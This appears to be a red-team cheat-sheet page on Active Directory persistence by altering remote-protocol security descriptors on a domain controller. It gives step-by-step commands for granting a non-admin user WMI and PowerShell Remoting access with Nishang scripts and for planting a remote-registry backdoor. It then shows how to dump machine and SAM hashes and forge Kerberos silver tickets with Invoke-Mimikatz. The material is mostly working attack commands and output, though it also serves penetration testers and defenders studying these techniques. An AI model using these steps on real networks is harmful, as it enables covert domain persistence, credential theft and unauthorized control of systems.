Modifying Remote Protocol Security Descriptors
This is an interesting way to obtain persistence because the ACL's for Remoting Protocols are rarely audited.
You must have Domain Admin privileges to perform these attacks. Modifying these descriptors can give non-admin users access to such things as WMI, Powershell Remoting, and the Remote Registry without having to give him Domain Admin privileges.
Subsequently the non-admin user will then be able to execute commands on the DC despite not being an admin.
Modifying the Descriptors Manually From the DC - Giving a User Full Control Over the WMI Namespace
Step 1 - In Component Services, Change the DCOM Permissions of the Computer
Give the user Remote Access permissions

Then give him all Launch and Activation permissions

Step 2 - Modify the WMI Namespace Settings in Computer Management
Give the user full rights over the root WMI namespace

Then make sure those rights apply to all of the child namespaces as well

Step 3 - Check the Access of the Non-Admin User to the DC
PS C:\Windows\system32> Get-WmiObject -Class win32_operatingsystem -ComputerName dc.domain
SystemDirectory : C:\Windows\system32
Organization :
BuildNumber : 14393
RegisteredUser : Windows User
SerialNumber : 00377-80000-00000-AA805
Version : 10.0.14393
Now our user can execute commands on the DC.
Giving a User Access to WMI From Powershell
With Set-RemoteWMI.ps1 (from Nishang)
. .\Set-RemoteWMI.ps1
Set-RemoteWMI -ComputerName <dc> -UserName <user> -Namespace 'root\cimv2' -verbose [-Credential <Domain Admin>]
Then login as that user and check the access:
Get-WmiObject -Class win32_operatingsystem -ComputerName <dc>
To Remove the Modified Descriptor
Set-RemoteWMI -ComputerName <dc> -UserName <user> -Namespace 'root\cimv2' -verbose -Remove [-Credential <Domain Admin>]
Change the Powershell Remoting Descriptors
With Set-RemotePSRemoting.ps1 (from Nishang)
Set-RemotePSRemoting -UserName <user> -ComputerName <dc> -Verbose
Then Execute Commands Remotely on the DC
Invoke-Command -ComputerName <dc> -ScriptBlock {<command>}
Changing the Remote Registry to Add a Backdoor and Retrieve Hashes
Step 1 - With Add-RemoteRegBackdoor.ps1
. .\Add-RemoteRegBackdoor.ps1
Add-RemoteRegBackdoor -ComputerName <dc> -Trustee <user>
Step 2 - In a New Window as the User, Use RemoteHashRetrieval.ps1
# Get the DC Machine Hash
Get-RemoteMachineAccountHash -ComputerName dcorp-dc -Verbose
# Dump the Local SAM Hashes
Get-RemoteLocalAccountHash -ComputerName dcorp-dc -Verbose
Step 3 - Exploit
With the DC hash we can create Silver Tickets.
Invoke-Mimikatz -Command '"kerberos::golden /domain:<domain> /sid:<domain-SID> /target:<target-domain> /service:<service> /rc4:<service-acct-or-computer-hash> /user:Administrator /ptt"'
With the Local Administrator hash we can DCSync or take advantage of the local Administrator hash being the DSRM password.
Last updated